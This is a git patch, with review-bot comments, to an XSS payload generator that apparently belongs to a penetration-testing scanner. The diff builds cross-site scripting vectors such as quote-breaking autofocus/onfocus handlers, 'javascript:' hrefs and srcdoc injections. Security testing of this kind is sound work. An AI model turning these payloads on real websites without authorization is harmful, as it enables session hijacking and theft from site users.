From 3b3b23a86c0193bff08ad27907e167020e01ba33 Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Fri, 19 Apr 2019 07:56:17 +0530 Subject: [PATCH] adapt to API changes, support for more contexts --- core/generator.py | 127 +++++++++++++++++++++------------------------- 1 file changed, 58 insertions(+), 69 deletions(-) diff --git a/core/generator.py b/core/generator.py index 67490d3..281a31c 100644 --- a/core/generator.py +++ b/core/generator.py 
@@ -9,105 +9,94 @@ def generator(occurences, response): vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(), 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()} for i in occurences: - context = occurences[i]['context'][0] - breaker = occurences[i]['context'][1] - special = occurences[i]['context'][2] - try: - attributeName = list(occurences[i]['context'][3].keys())[0] - attributeValue = list(occurences[i]['context'][3].values())[0] - except AttributeError: - attributeName = occurences[i]['context'][3] - if special not in badTags: - special = '' - elif context == 'attribute': - special = '' - else: - special = '' + context = occurences[i]['context'] if context == 'html': lessBracketEfficiency = occurences[i]['score']['<'] greatBracketEfficiency = occurences[i]['score']['>'] - breakerEfficiency = occurences[i]['score'][breaker] - if breaker == '\'' or breaker == '"': - breaker = '' - breakerEfficiency = 100 ends = ['//'] + badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else '' if greatBracketEfficiency == 100: ends.append('>') - if lessBracketEfficiency == breakerEfficiency == 100: + if lessBracketEfficiency: payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends, badTag) for payload in payloads: vectors[10].add(payload) elif context == 'attribute': found = False - breakerEfficiency = occurences[i]['score'][breaker] + quote = occurences[i]['details']['quote'] + Type = occurences[i]['details']['type'] + attributeName = occurences[i]['details']['name'] + attributeValue = occurences[i]['details']['value'] + quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100 greatBracketEfficiency = occurences[i]['score']['>'] ends = ['//'] if greatBracketEfficiency == 100: ends.append('>') - if greatBracketEfficiency == 100 and breakerEfficiency == 100: + if greatBracketEfficiency == 100 and 
quoteEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends) for payload in payloads: - if breaker: - payload = payload.replace(breaker, breaker + '>') - else: - payload = '>' + payload + payload = quote + '>' + payload found = True - vectors[6].add(payload) - if breakerEfficiency == 100: + vectors[9].add(payload) + if quoteEfficiency == 100: for filling in fillings: for function in functions: - vector = breaker + filling + 'auTOfOcuS' + \ - filling + 'OnFoCUs' + '=' + breaker + function + vector = quote + filling + r('autofocus') + \ + filling + r('onfocus') + '=' + quote + function found = True - vectors[6].add(vector) - if breakerEfficiency == 90: + vectors[8].add(vector) + if quoteEfficiency == 90: for filling in fillings: for function in functions: - vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \ - 'OnFoCUs' + '=' + function + filling + '\\' + breaker + vector = '\\' + quote + filling + r('autofocus') + filling + \ + r('onfocus') + '=' + function + filling + '\\' + quote found = True - vectors[6].add(vector) - if attributeName == 'srcdoc': - if occurences[i]['score']['<']: - if occurences[i]['score']['>']: - del ends[:] - ends.append('%26gt;') - payloads = genGen( - fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '') - for payload in payloads: + vectors[7].add(vector) + if Type == 'value': + if attributeName == 'srcdoc': + if occurences[i]['score']['<']: + if occurences[i]['score']['>']: + del ends[:] + ends.append('%26gt;') + payloads = genGen( + fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) + for payload in payloads: + found = True + vectors[9].add(payload.replace('<', '%26lt;')) + elif attributeName == 'href' and attributeValue == xsschecker: + for function in functions: found = True - vectors[9].add(payload.replace('<', '%26lt;')) - if attributeName.startswith('on'): - closer = 
jsContexter(attributeValue) - breaker = '' - for char in attributeValue.split(xsschecker)[1]: - if char in ['\'', '"', '`']: - breaker = char - break - if closer: + vectors[10].add(r('javascript:') + function) + elif attributeName.startswith('on'): + closer = jsContexter(attributeValue) + quote = '' + for char in attributeValue.split(xsschecker)[1]: + if char in ['\'', '"', '`']: + quote = char + break suffix = '//\\' for filling in jFillings: for function in functions: - vector = breaker + closer + filling + function + suffix - if found: - vectors[7].add(vector) - else: - vectors[9].add(vector) - elif breakerEfficiency > 83: - suffix = '//' - for filling in jFillings: - for function in functions: - if '=' in function: - function = '(' + function + ')' - if breaker == '': - filling = '' - vector = '\\' + breaker + closer + filling + function + suffix + vector = quote + closer + filling + function + suffix if found: vectors[7].add(vector) else: vectors[9].add(vector) + if quoteEfficiency > 83: + suffix = '//' + for filling in jFillings: + for function in functions: + if '=' in function: + function = '(' + function + ')' + if quote == '': + filling = '' + vector = '\\' + quote + closer + filling + function + suffix + if found: + vectors[7].add(vector) + else: + vectors[9].add(vector) elif context == 'comment': lessBracketEfficiency = occurences[i]['score']['<'] @@ -118,7 +107,7 @@ def generator(occurences, response): ends.append('>') if lessBracketEfficiency == breakerEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends) for payload in payloads: vectors[10].add(payload) elif context == 'script': 
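Review bot: The relaxed guard `if lessBracketEfficiency:` in the html branch fires on any non-zero `<` score, while the comment branch in the next hunk still demands `lessBracketEfficiency == breakerEfficiency == 100`, so the two contexts now disagree on what counts as a usable `<`; if that is intended, a one-line comment such as `# html context: a partially filtered '<' is still worth a payload` would stop the next reader from restoring `== 100`, otherwise restore it. The new code reads `details['quote']`, `['type']`, `['name']` and `['value']` by direct indexing but guards `'badTag'` with an `in` test, and the `occurences` schema the function now expects is documented nowhere, so `generator` should get a docstring listing the `context`, `score` and `details` keys each context must supply, with the optional ones read as `.get('badTag', '')` and `.get(quote, 100)`. In the `on*` branch `quote` is rebound to the quote character found inside the attribute value, yet the following `if quoteEfficiency > 83:` block still relies on the efficiency computed for the original attribute quote, so the test and the character it guards may refer to different things; indentation is lost in this rendering, so I also cannot tell whether that block sits inside the `on*` branch where `closer` is defined, which is worth confirming. `Type` as a local name reads as a class; `attrType` would match the surrounding `attributeName`/`attributeValue` naming. `generator` begins before this hunk and continues past it.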
@@ -139,7 +128,7 @@ def generator(occurences, response):
 if scriptEfficiency == 100:
 breaker = r('')
 payloads = genGen(fillings, eFillings, lFillings,
- eventHandlers, tags, functions, ends, breaker, special)
+ eventHandlers, tags, functions, ends)
 for payload in payloads:
 vectors[10].add(payload)
 if closer:
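Review bot: With `breaker` dropped from the genGen call, the `breaker = r('')` assignment on the context line just above it looks like a dead store unless the script branch reads `breaker` further down; the branch continues past the hunk, so I cannot confirm, but if nothing reads it the line should be removed with this change rather than left behind. `generator` begins before this hunk and continues past it.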